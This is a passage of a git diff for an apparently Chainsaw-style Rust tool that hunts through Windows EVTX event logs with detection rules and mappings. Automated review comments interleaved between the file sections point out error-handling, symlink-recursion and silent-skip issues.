@@ -1,35 +0,0 @@ -use crate::hunt::ChainsawRule; -use anyhow::Result; -use std::fs::File; -use std::io::Read; -use std::path::Path; - -#[derive(Clone, Deserialize)] -pub struct Stalker { - tag: String, - tau: tau_engine::Rule, - level: String, - status: String, - authors: Vec, -} - -impl From for ChainsawRule { - fn from(stalker: Stalker) -> Self { - Self { - tag: stalker.tag, - level: Some(stalker.level), - status: Some(stalker.status), - logic: stalker.tau, - authors: Some(stalker.authors), - } - } -} - -pub fn load(rule: &Path) -> Result { - let mut file = File::open(rule)?; - let mut contents = String::new(); - file.read_to_string(&mut contents)?; - - let stalker: Stalker = serde_yaml::from_str(&contents)?; - Ok(ChainsawRule::from(stalker)) -} diff --git a/src/ext/mod.rs b/src/ext/mod.rs new file mode 100644 index 00000000..6a08025e --- /dev/null +++ b/src/ext/mod.rs @@ -0,0 +1 @@ +pub mod tau; diff --git a/src/ext/tau.rs b/src/ext/tau.rs new file mode 100644 index 00000000..84c6cf88 --- /dev/null +++ b/src/ext/tau.rs 
@@ -0,0 +1,129 @@ +use aho_corasick::AhoCorasickBuilder; +use tau_engine::core::parser::{BoolSym, Expression, IdentifierParser, MatchType, Pattern, Search}; + +pub fn parse_kv(kv: &str) -> crate::Result { + let mut parts = kv.split(": "); + let key = parts.next().expect("invalid tau key value pair"); + let value = parts.next().expect("invalid tau key value pair"); + // NOTE: This is pinched from tau-engine as it is not exposed. + let identifier = value.to_owned().into_identifier()?; + let expression = match identifier.pattern { + Pattern::Equal(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::Equal, + Box::new(Expression::Integer(i)), + ), + Pattern::GreaterThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThan, + Box::new(Expression::Integer(i)), + ), + Pattern::GreaterThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThanOrEqual, + Box::new(Expression::Integer(i)), + ), + Pattern::LessThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThan, + Box::new(Expression::Integer(i)), + ), + Pattern::LessThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThanOrEqual, + Box::new(Expression::Integer(i)), + ), + Pattern::FEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::Equal, + Box::new(Expression::Float(i)), + ), + Pattern::FGreaterThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThan, + Box::new(Expression::Float(i)), + ), + Pattern::FGreaterThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThanOrEqual, + Box::new(Expression::Float(i)), + ), + Pattern::FLessThan(i) => Expression::BooleanExpression( + 
Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThan, + Box::new(Expression::Float(i)), + ), + Pattern::FLessThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThanOrEqual, + Box::new(Expression::Float(i)), + ), + Pattern::Any => Expression::Search(Search::Any, key.to_owned()), + Pattern::Regex(c) => Expression::Search(Search::Regex(c), key.to_owned()), + Pattern::Contains(c) => Expression::Search( + if identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::Contains(c)], + ) + } else { + Search::Contains(c) + }, + key.to_owned(), + ), + Pattern::EndsWith(c) => Expression::Search( + if identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::EndsWith(c)], + ) + } else { + Search::EndsWith(c) + }, + key.to_owned(), + ), + Pattern::Exact(c) => Expression::Search( + if !c.is_empty() && identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::Exact(c)], + ) + } else { + Search::Exact(c) + }, + key.to_owned(), + ), + Pattern::StartsWith(c) => Expression::Search( + if identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::StartsWith(c)], + ) + } else { + Search::StartsWith(c) + }, + key.to_owned(), + ), + }; + Ok(expression) +} diff --git a/src/file/evtx.rs b/src/file/evtx.rs new file mode 100644 index 00000000..6666ab89 --- /dev/null +++ b/src/file/evtx.rs 
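Review bot: `parts.next().expect("invalid tau key value pair")` in parse_kv panics on malformed input even though the function returns `crate::Result`, and `kv.split(": ")` silently drops everything after a second `": "`, so a value containing `: ` (a path, a message) is truncated without any error. Replace both lines with `let (key, value) = kv.split_once(": ").ok_or_else(|| anyhow::anyhow!("invalid tau key value pair: {}", kv))?;`, which keeps the whole remainder as the value and turns bad input into an error the caller can print. The four `AhoCorasickBuilder` arms are identical apart from the `MatchType`; a small `fn ci_search(c: String, m: MatchType) -> Search` helper would put the case-insensitive handling in one place.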
@@ -0,0 +1,93 @@ +use std::collections::{HashMap, HashSet}; +use std::fs::File; +use std::path::Path; + +use evtx::{err::EvtxError, EvtxParser, ParserSettings, SerializedEvtxRecord}; +use regex::RegexSet; +use serde_json::Value as Json; +use tau_engine::{Document, Value as Tau}; + +use crate::hunt::{Group, Huntable}; +use crate::rule::Rule; +use crate::search::Searchable; + +pub type Evtx = SerializedEvtxRecord; + +pub struct Parser { + pub inner: EvtxParser, +} + +impl Parser { + pub fn load(file: &Path) -> crate::Result { + let settings = ParserSettings::default() + .separate_json_attributes(true) + .num_threads(0); + let parser = EvtxParser::from_path(file)?.with_configuration(settings); + Ok(Self { inner: parser }) + } + + pub fn parse( + &mut self, + ) -> impl Iterator, EvtxError>> + '_ { + self.inner.records_json_value() + } +} + +pub struct Mapper<'a>(&'a HashMap, &'a Wrapper<'a>); +impl<'a> Document for Mapper<'a> { + fn find(&self, key: &str) -> Option> { + self.0.get(key).and_then(|v| self.1.find(v)) + } +} + +pub struct Wrapper<'a>(pub &'a Json); +impl<'a> Document for Wrapper<'a> { + fn find(&self, key: &str) -> Option> { + // As event logs can store values in a key or complex objects we do some aliasing here for + // convenience... + match key { + "Event.System.EventID" => { + // FIXME: If `#text` returns text then we need to map this to a u64 otherwise it + // will be ignored... 
+ self.0 + .find("Event.System.EventID.#text") + .or(self.0.find(key)) + } + "Event.System.Provider" => self.0.find("Event.System.Provider_attributes.Name"), + "Event.System.TimeCreated" => self + .0 + .find("Event.System.TimeCreated_attributes.SystemTime"), + _ => self.0.find(key), + } + } +} + +impl Huntable for &SerializedEvtxRecord { + fn hits( + &self, + rules: &[Rule], + exclusions: &HashSet, + group: &Group, + ) -> Option> { + let wrapper = Wrapper(&self.data); + if tau_engine::core::solve(&group.filter, &wrapper) { + let mut tags = vec![]; + for rule in rules { + if exclusions.contains(&rule.tag) { + continue; + } + if rule.tau.matches(&Mapper(&group.fields, &wrapper)) { + tags.push(rule.tag.clone()); + } + } + return Some(tags); + } + None + } +} + +impl Searchable for SerializedEvtxRecord { + fn matches(&self, regex: &RegexSet) -> bool { + regex.is_match(&self.data.to_string()) + } +} diff --git a/src/file/mod.rs b/src/file/mod.rs new file mode 100644 index 00000000..e1562f13 --- /dev/null +++ b/src/file/mod.rs 
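Review bot: The FIXME in `Wrapper::find` for `Event.System.EventID` is a silent false-negative path: when `#text` comes back as a string, the integer filters in the mapping (`Event.System.EventID: 1` and friends) never match and the record yields no hits with no indication to the analyst. Rather than leave it as a FIXME, parse a string `#text` into the unsigned-integer Tau value before returning it (events carrying a `Qualifiers` attribute are presumably the ones that take this path — worth confirming with a sample), or at minimum count such records and report the total at the end of the run. Separately, `Searchable::matches` re-serialises the whole record with `self.data.to_string()` on every call, which is per-record JSON serialisation on the hot path; building that string once per record would remove it.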
@@ -0,0 +1,132 @@ +use std::fs; +use std::path::{Path, PathBuf}; + +use self::evtx::{Evtx, Parser as EvtxParser}; + +pub mod evtx; + +pub enum Document { + Evtx(Evtx), +} + +pub struct Documents<'a> { + iterator: Box> + 'a>, +} + +impl<'a> Iterator for Documents<'a> { + type Item = crate::Result; + + fn next(&mut self) -> Option { + self.iterator.next() + } +} + +pub struct Unknown; +impl Iterator for Unknown { + type Item = crate::Result; + + fn next(&mut self) -> Option { + None + } +} + +pub enum Parser { + Evtx(EvtxParser), + Unknown, +} + +pub struct Reader { + parser: Parser, +} + +impl Reader { + pub fn load(file: &Path, load_unknown: bool, skip_errors: bool) -> crate::Result { + // NOTE: We don't want to use libmagic because then we have to include databases etc... So + // for now we assume that the file extensions are correct! + match file.extension().and_then(|e| e.to_str()) { + Some(extension) => match extension { + "evtx" => Ok(Self { + parser: Parser::Evtx(EvtxParser::load(file)?), + }), + _ => { + if load_unknown { + if skip_errors { + cs_eyellowln!("file type is not currently supported - {}", extension); + Ok(Self { + parser: Parser::Unknown, + }) + } else { + anyhow::bail!("file type is not currently supported - {}", extension) + } + } else { + Ok(Self { + parser: Parser::Unknown, + }) + } + } + }, + None => { + if load_unknown { + if let Ok(parser) = EvtxParser::load(file) { + return Ok(Self { + parser: Parser::Evtx(parser), + }); + } + if skip_errors { + cs_eyellowln!("file type is not known"); + + Ok(Self { + parser: Parser::Unknown, + }) + } else { + anyhow::bail!("file type is not known") + } + } else { + Ok(Self { + parser: Parser::Unknown, + }) + } + } + } + } + + pub fn documents<'a>(&'a mut self) -> Documents<'a> { + let iterator = match &mut self.parser { + Parser::Evtx(parser) => Box::new( + parser + .parse() + .map(|r| r.map(|d| Document::Evtx(d)).map_err(|e| e.into())), + ), + Parser::Unknown => { + Box::new(Unknown) as Box> + 'a> + } + 
}; + Documents { iterator } + } +} + +pub fn get_files(path: &PathBuf, extension: &Option) -> crate::Result> { + let mut files: Vec = vec![]; + if path.exists() { + let metadata = fs::metadata(&path)?; + if metadata.is_dir() { + let directory = path.read_dir()?; + for dir in directory { + files.extend(get_files(&dir?.path(), &extension)?); + } + } else { + if let Some(extension) = extension { + if let Some(ext) = path.extension() { + if ext == extension.as_str() { + files.push(path.to_path_buf()); + } + } + } else { + files.push(path.to_path_buf()); + } + } + } else { + anyhow::bail!("Invalid input path: {}", path.display()); + } + Ok(files) +} diff --git a/src/hunt.rs b/src/hunt.rs new file mode 100644 index 00000000..28f5da7e --- /dev/null +++ b/src/hunt.rs 
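Review bot: `get_files` follows symlinks while recursing — `path.exists()`, `fs::metadata` and `read_dir` all resolve them — so a directory tree containing a link back to an ancestor (not unusual on mounted images) recurses until the stack overflows, with no visited set or depth bound to stop it. The cheapest guard is `let metadata = fs::symlink_metadata(&path)?;`, which makes a linked directory fall into the file branch and breaks the cycle, though it also stops traversal of legitimate directory links, so a set of visited canonical paths may be the better fix. Separately, both the `"evtx"` arm in `Reader::load` and `ext == extension.as_str()` compare extensions case-sensitively, so `.EVTX` files copied off Windows are treated as unknown or skipped without a message; `extension.eq_ignore_ascii_case("evtx")` and `ext.eq_ignore_ascii_case(extension)` would cover both. The note about trusting extensions is fair, but the evtx-parse fallback runs only when a file has no extension at all, so a renamed log is never probed; that limitation belongs in the doc comment on `Reader::load`.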
@@ -0,0 +1,356 @@ +use std::collections::{HashMap, HashSet}; +use std::fs::File; +use std::io::Read; +use std::path::{Path, PathBuf}; + +use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; +use chrono_tz::Tz; +use serde::{de, Deserialize, Serialize}; +use serde_json::Value as Json; +use serde_yaml::Value as Yaml; +use tau_engine::{ + core::parser::{parse_identifier, Expression}, + Document as Docu, +}; + +use crate::file::{Document as Doc, Reader}; +use crate::rule::{Kind as RuleKind, Rule}; + +#[derive(Deserialize)] +pub struct Group { + #[serde(default)] + pub default: Option>, + pub fields: HashMap, + #[serde(deserialize_with = "deserialize_expression")] + pub filter: Expression, + pub name: String, + pub timestamp: String, +} + +fn deserialize_expression<'de, D>(deserializer: D) -> Result +where + D: de::Deserializer<'de>, +{ + let yaml: Yaml = de::Deserialize::deserialize(deserializer)?; + parse_identifier(&yaml).map_err(de::Error::custom) +} + +#[derive(Deserialize)] +pub struct Mapping { + #[serde(default)] + pub exclusions: HashSet, + pub groups: Vec, + pub kind: String, + pub name: String, + pub rules: RuleKind, +} + +pub struct Hit { + pub group: String, + pub mapping: Option, + pub tag: String, + pub timestamp: NaiveDateTime, +} + +pub struct Detections { + pub hits: Vec, + pub kind: Kind, +} + +#[derive(Debug, Serialize)] +pub struct Detection<'a> { + pub authors: &'a Vec, + pub group: &'a String, + #[serde(flatten)] + pub kind: &'a Kind, + pub level: &'a String, + pub name: &'a String, + pub source: &'a String, + pub status: &'a String, + pub timestamp: String, +} + +#[derive(Debug, Serialize)] +pub struct Document { + pub kind: String, + pub data: Json, +} + +#[derive(Debug, Serialize)] +#[serde(rename_all = "snake_case", tag = "kind")] +pub enum Kind { + Aggregate { documents: Vec }, + Individual { document: Document }, +} + +pub trait Huntable { + fn hits( + &self, + rules: &[Rule], + exclusions: &HashSet, + group: &Group, + ) -> Option>; +} + 
+#[derive(Default)] +pub struct HunterBuilder { + mappings: Option>, + rules: Option>, + + load_unknown: Option, + local: Option, + from: Option, + skip_errors: Option, + timezone: Option, + to: Option, +} + +impl HunterBuilder { + pub fn new() -> Self { + Self::default() + } + + pub fn build(self) -> crate::Result { + let mappings = match self.mappings { + Some(mappings) => { + let mut scratch = vec![]; + for mapping in mappings { + let mut file = File::open(mapping)?; + let mut content = String::new(); + file.read_to_string(&mut content)?; + scratch.push(serde_yaml::from_str(&mut content)?); + } + scratch + } + None => vec![], + }; + let rules = match self.rules { + Some(rules) => rules, + None => vec![], + }; + + let load_unknown = self.load_unknown.unwrap_or_default(); + let local = self.local.unwrap_or_default(); + let skip_errors = self.skip_errors.unwrap_or_default(); + + Ok(Hunter { + inner: HunterInner { + mappings, + rules, + + from: self.from.map(|d| DateTime::from_utc(d, Utc)), + load_unknown, + local, + skip_errors, + timezone: self.timezone, + to: self.to.map(|d| DateTime::from_utc(d, Utc)), + }, + }) + } + + pub fn from(mut self, datetime: NaiveDateTime) -> Self { + self.from = Some(datetime); + self + } + + pub fn load_unknown(mut self, allow: bool) -> Self { + self.load_unknown = Some(allow); + self + } + + pub fn local(mut self, local: bool) -> Self { + self.local = Some(local); + self + } + + pub fn mappings(mut self, paths: Vec) -> Self { + self.mappings = Some(paths); + self + } + + pub fn rules(mut self, rules: Vec) -> Self { + self.rules = Some(rules); + self + } + + pub fn skip_errors(mut self, skip: bool) -> Self { + self.skip_errors = Some(skip); + self + } + + pub fn timezone(mut self, tz: Tz) -> Self { + self.timezone = Some(tz); + self + } + + pub fn to(mut self, datetime: NaiveDateTime) -> Self { + self.to = Some(datetime); + self + } +} + +pub struct HunterInner { + mappings: Vec, + rules: Vec, + + load_unknown: bool, + local: bool, + 
from: Option>, + skip_errors: bool, + timezone: Option, + to: Option>, +} + +pub struct Hunter { + inner: HunterInner, +} + +impl Hunter { + pub fn builder() -> HunterBuilder { + HunterBuilder::new() + } + + pub fn hunt(&self, file: &Path) -> crate::Result> { + let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; + let mut detections = vec![]; + for document in reader.documents() { + let document = match document { + Ok(document) => document, + Err(e) => { + if self.inner.skip_errors { + continue; + } + return Err(e); + } + }; + + // The logic is as follows, all rules except chainsaw ones need a mapping. + + // TODO: Handle chainsaw rules... + + for mapping in &self.inner.mappings { + if mapping.kind != "evtx" { + continue; + } + + let mut hits = vec![]; + for group in &mapping.groups { + // TODO: Default to RFC 3339 + let timestamp = match &document { + Doc::Evtx(evtx) => { + match crate::evtx::Wrapper(&evtx.data).find(&group.timestamp) { + Some(value) => match value.as_str() { + Some(timestamp) => match NaiveDateTime::parse_from_str( + timestamp, + "%Y-%m-%dT%H:%M:%S%.6fZ", + ) { + Ok(t) => t, + Err(e) => { + if self.inner.skip_errors { + cs_eyellowln!( + "failed to parse timestamp '{}' - {}", + timestamp, + e, + ); + continue; + } else { + anyhow::bail!( + "failed to parse timestamp '{}' - {}", + timestamp, + e + ); + } + } + }, + None => continue, + }, + None => continue, + } + } + }; + + if self.inner.from.is_some() || self.inner.to.is_some() { + // TODO: Not sure if this is correct... 
+ let localised = if let Some(timezone) = self.inner.timezone { + let local = match timezone.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + }; + local.with_timezone(&Utc) + } else if self.inner.local { + match Utc.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + } + } else { + DateTime::::from_utc(timestamp, Utc) + }; + // Check if event is older than start date marker + if let Some(sd) = self.inner.from { + if localised <= sd { + continue; + } + } + // Check if event is newer than end date marker + if let Some(ed) = self.inner.to { + if localised >= ed { + continue; + } + } + } + if let Some(tags) = match &document { + Doc::Evtx(evtx) => evtx.hits(&self.inner.rules, &mapping.exclusions, group), + } { + for tag in tags { + hits.push(Hit { + tag, + group: group.name.clone(), + mapping: Some(mapping.name.clone()), + timestamp, + }); + } + } + } + + if hits.is_empty() { + continue; + } + let data = match &document { + Doc::Evtx(evtx) => evtx.data.clone(), + }; + detections.push(Detections { + hits, + kind: Kind::Individual { + document: Document { + kind: "evtx".to_owned(), + data, + }, + }, + }); + } + } + Ok(detections) + } + + pub fn mappings(&self) -> &Vec { + &self.inner.mappings + } + + pub fn rules(&self) -> &Vec { + &self.inner.rules + } +} diff --git a/src/hunt/mod.rs b/src/hunt/mod.rs deleted file mode 100644 index 9fb72105..00000000 --- a/src/hunt/mod.rs +++ /dev/null 
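Review bot: In `Hunter::hunt`, a document that fails to parse is dropped with a bare `continue` when `skip_errors` is set, with no warning and no count, whereas a bad timestamp a few lines later does print via `cs_eyellowln!`; for a forensic tool, silently discarding records — plausibly the corrupt or tampered ones — leaves the analyst with no signal that the evidence set is incomplete. Printing `cs_eyellowln!("failed to parse document - {}", e);` before that `continue`, or counting skips and reporting the total at the end, closes the gap. In `HunterBuilder::build`, `serde_yaml::from_str(&mut content)?` loses the file name that the removed `get_mapping_file` included in its error; opening with `File::open(&mapping)?` and using `.map_err(|e| anyhow::anyhow!("{}: {}", mapping.display(), e))?` on the parse restores it (the `&mut` is also unnecessary, `from_str` takes `&str`). The timestamp format is hard-coded to a six-digit-fraction `Z` form and the TODO already notes RFC 3339; until that lands, the doc comment on `hunt` should say that records whose `group.timestamp` field is missing or not in that form are skipped without being hunted.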
@@ -1,873 +0,0 @@ -use std::collections::HashMap; -use std::fs::{create_dir_all, metadata, File}; -use std::io::Read; -use std::path::{Path, PathBuf}; - -use anyhow::Result; -use chrono::NaiveDateTime; -use itertools::Itertools; -use prettytable::format; -use prettytable::row::Row; -use prettytable::Table; -use structopt::StructOpt; -use walkdir::WalkDir; - -use crate::convert::{sigma, stalker}; -use crate::util::RULE_PREFIX; -use crate::util::{get_evtx_files, get_progress_bar, large_event_logs, parse_evtx_file}; - -pub(crate) mod modules; - -#[derive(StructOpt)] -pub struct HuntOpts { - /// Specify an EVTX file, or a directory containing the EVTX files to search. - /// If you specify a directory, all files matching *.evtx will be used. - /// - /// Specifying "win_default" will use "C:\Windows\System32\winevt\Logs\" - pub evtx_path: PathBuf, - - /// Suppress all unnecessary output - #[structopt(short = "q", long = "quiet")] - pub quiet: bool, - - /// Skip EVTX file if chainsaw is unable to parse the records - #[structopt(long = "ignore-errors")] - pub ignore: bool, - - // Specify the detection rule directory to use - // - /// Specify a directory containing detection rules to use. All files matching *.yml will be used. - #[structopt(short = "r", long = "rules")] - pub rules_path: Option, - - // Specify a mapping file - // - /// Specify the mapping file to use to with the specified detection rules. 
- /// Required when using the --rule/-r flag - #[structopt(short = "m", long = "mapping")] - pub mapping_path: Option, - - /// List additional 4624 events potentially relating to lateral movement - #[structopt(long = "lateral-all")] - pub lateral_all: bool, - - /// Save hunt output to individual CSV files in the specified directory - #[structopt(long = "csv", group = "format")] - pub csv: Option, - - /// Show rule author information in table output - #[structopt(long = "authors")] - pub show_authors: bool, - - /// Show full event output, otherwise output is trunctated to improve readability - #[structopt(long = "full")] - pub full_output: bool, - - /// For each detection, output the associated event log entry and detection information in a JSON format - #[structopt(short, long = "json", group = "format")] - pub json: bool, - - /// Do not use inbuilt detection logic, only use the specified rules for detection - #[structopt(long = "no-builtin")] - pub disable_inbuilt_logic: bool, - - /// Change the maximum column width (default 40). Use this option if the table output is un-readable - #[structopt(long = "col-width", default_value = "40")] - pub col_width: i32, - - /// Start date for including events (UTC). Anything older than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. Example: 2019-11-17T17:55:11 - #[structopt(long = "start-date")] - pub start_date: Option, - - /// End date for including events (UTC). Anything newer than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. 
Example: 2019-11-17T17:55:11 - #[structopt(long = "end-date")] - pub end_date: Option, - - /// File to write output to, this is ignored by --csv - #[structopt(long = "output")] - pub output: Option, -} - -#[derive(Serialize)] -pub struct JsonDetection { - detection: Vec, - event: serde_json::Value, -} - -#[derive(Clone)] -pub struct Detection { - headers: Vec, - title: String, - values: Vec, -} - -#[derive(Clone, Deserialize)] -#[serde(rename_all = "lowercase")] -pub struct ChainsawRule { - pub level: Option, - #[serde(flatten)] - pub logic: tau_engine::Rule, - #[serde(alias = "title")] - pub tag: String, - pub status: Option, - pub authors: Option>, -} - -#[derive(Debug, PartialEq, Deserialize)] -pub struct Events { - provider: String, - search_fields: HashMap, - table_headers: HashMap, - title: String, -} - -#[derive(Debug, PartialEq, Deserialize)] -pub struct Mapping { - pub exclusions: Option>, - pub kind: String, - pub mappings: HashMap, -} - -enum Provider { - Defender, - EventLogAction, - FSecure, - Kaspersky, - SecurityAuditing, - ServiceControl, - Sophos, -} - -pub enum RuleType { - Stalker, - Sigma, -} - -impl RuleType { - pub fn from(kind: &str) -> Option { - match kind.to_lowercase().as_str() { - "sigma" => Some(RuleType::Sigma), - "stalker" => Some(RuleType::Stalker), - &_ => None, - } - } -} - -impl Provider { - fn resolve(provider: Option) -> Option { - if let Some(p) = provider { - match p.as_str() { - "F-Secure Ultralight SDK" => return Some(Provider::FSecure), - "Microsoft-Windows-Eventlog" => return Some(Provider::EventLogAction), - "Microsoft-Windows-Security-Auditing" => return Some(Provider::SecurityAuditing), - "Microsoft-Windows-Windows Defender" => return Some(Provider::Defender), - "OnDemandScan" => return Some(Provider::Kaspersky), - "Real-time file protection" => return Some(Provider::Kaspersky), - "Service Control Manager" => return Some(Provider::ServiceControl), - "Sophos Anti-Virus" => return Some(Provider::Sophos), - &_ => return 
None, - } - } - None - } -} - -pub fn det_to_json( - det: Detection, - event: serde_json::Value, - target: &str, -) -> Result { - let detection; - match target { - "rules" => { - // Get field containing names of detection rules that fired - let rules = match det.values.get(2) { - Some(r) => r, - None => return Err(anyhow!("Failed to get rules from detection!")), - }; - detection = rules - .replace("\n", " ") - .split(RULE_PREFIX) - .map(|s| s.trim_end()) - .map(|s| s.to_string()) - .filter(|s| !s.is_empty()) - .collect(); - } - "title" => { - detection = vec![det.title]; - } - _ => return Err(anyhow!("Unsupported target for det_to_json!")), - } - Ok(JsonDetection { detection, event }) -} - -pub fn run_hunt(opt: HuntOpts) -> Result { - // Main function for parsing and hunting through event logs - let evtx_files = get_evtx_files(&opt.evtx_path)?; - let mut det = None; - let mut grouped_events = HashMap::new(); - let mut hunt_detections = Vec::new(); - let mut json_detections = Vec::new(); - let mut mapping_file = None; - let mut sd_marker = None; - let mut ed_marker = None; - - let time_format = "%Y-%m-%dT%H:%M:%S"; - - // if start date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.start_date { - sd_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events before: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided start-date filter: {}", e)), - } - } - - // if end date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.end_date { - ed_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events after: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided end-date filter: {}", e)), - } - } - - // If detection rules are provided we need to load, convert and apply mapping file - let 
detection_rules = match &opt.rules_path { - Some(rules) => { - match opt.mapping_path.clone() { - Some(file) => { - // Load and check mapping file - mapping_file = Some(get_mapping_file(&file)?); - } - None => { - return Err(anyhow!( - "A mapping file must be specified when using detection rules, use --mapping to specify one" - )); - } - }; - cs_eprintln!("[+] Converting detection rules..."); - // Load detection rules - Some(load_detection_rules( - rules, - false, - mapping_file.as_ref().expect("No mapping file"), - false, - )?) - } - None => { - if opt.disable_inbuilt_logic { - return Err( - anyhow!( - "In-built detection logic disabled (--no-builtin) but no detection rules provided! Use --rules to specify rules"), - ); - } - cs_eyellowln!("[!] Continuing without detection rules, no path provided"); - None - } - }; - if opt.disable_inbuilt_logic { - cs_eyellowln!( - "[!] Inbuilt detection logic disabled (--no-builtin). Only using specified rule files" - ); - } - - if large_event_logs(&evtx_files) { - cs_eyellowln!( - "[!] Provided event logs are over 500MB in size. 
This will take a while to parse...", - ); - } - // Set up progress bar - let pb = get_progress_bar(evtx_files.len() as u64, "Hunting".to_string()); - // Loop through EVTX files and perform actions - for evtx in &evtx_files { - pb.tick(); - // Parse EVTX files - let mut parser = match parse_evtx_file(evtx) { - Ok(a) => a, - Err(e) => { - if opt.ignore { - continue; - } - return Err(anyhow!("{:?} - {}", evtx, e)); - } - }; - // Loop through records and hunt for suspicious indicators - for record in parser.records_json_value() { - let r = match record { - Ok(record) => record, - Err(_) => { - continue; - } - }; - // Perform start/end datetime filtering - if sd_marker.is_some() || ed_marker.is_some() { - let event_time = match NaiveDateTime::parse_from_str( - r.data["Event"]["System"]["TimeCreated_attributes"]["SystemTime"] - .as_str() - .unwrap(), - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(_) => { - return Err(anyhow!( - "Failed to parse datetime from supplied events. This shouldn't happen...")); - } - }; - - // Check if event is older than start date marker - if let Some(sd) = sd_marker { - if event_time <= sd { - continue; - } - } - // Check if event is newer than end date marker - if let Some(ed) = ed_marker { - if event_time >= ed { - continue; - } - } - } - - let e_id; - - // Event ID can be stored in two different locations - if r.data["Event"]["System"]["EventID"]["#text"].is_null() { - e_id = &r.data["Event"]["System"]["EventID"]; - } else { - e_id = &r.data["Event"]["System"]["EventID"]["#text"]; - } - - // Convert event_id to u64 value - let e_id = match e_id.as_u64() { - Some(e) => e, - None => continue, - }; - if let Some(mapping) = &mapping_file { - if mapping.mappings.contains_key(&e_id) { - if let Some(rules) = &detection_rules { - // Pass event doc and Detection rules to processor for rule detection - if let Some(det) = modules::detect_tau_matches( - &r.data, - e_id, - rules, - &mapping.mappings, - &opt.full_output, - opt.col_width, - 
&opt.show_authors, - ) { - if opt.json { - json_detections.push(det_to_json( - det.clone(), - r.data.clone(), - "rules", - )?); - } - hunt_detections.push(det); - } - } - } - } - if !opt.disable_inbuilt_logic { - // - // This is where we run hunt modules on evtx records - // We either continue detect events and push them into Detection structs - // or collect events for analysis across multiple evtx files - // e.g. password-spraying - // - let raw_provider = - ajson::get(&r.data.to_string(), "Event.System.Provider_attributes.Name"); - if let Some(provider) = Provider::resolve(raw_provider) { - match provider { - // Get Defender AV Events - Provider::Defender => { - if e_id == 1116 { - det = modules::detect_defender_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - // Detect event logs being cleared - Provider::EventLogAction => { - if e_id == 1102 || e_id == 104 { - det = modules::detect_cleared_logs(&r.data, &e_id) - } - } - // Get F-Secure AV events - Provider::FSecure => { - if e_id == 2 { - det = modules::detect_ultralight_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - // Get Kaspersky AV Events - Provider::Kaspersky => { - if e_id == 3203 || e_id == 5203 { - det = modules::detect_kaspersky_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - Provider::SecurityAuditing => { - if e_id == 4728 || e_id == 4732 || e_id == 4756 { - det = modules::detect_group_changes(&r.data, &e_id) - } else if e_id == 4720 { - det = modules::detect_created_users(&r.data, &e_id) - } else if e_id == 4625 || e_id == 4624 { - if let Some(fields) = modules::extract_logon_fields(&r.data) { - grouped_events - .entry(e_id) - .or_insert_with(Vec::new) - .push(fields); - } - } - } - Provider::ServiceControl => { - if e_id == 7040 { - det = modules::detect_stopped_service(&r.data, &e_id) - } - } - // Get Sophos AV Events - Provider::Sophos => { - if e_id == 32 || e_id == 16 { - det = 
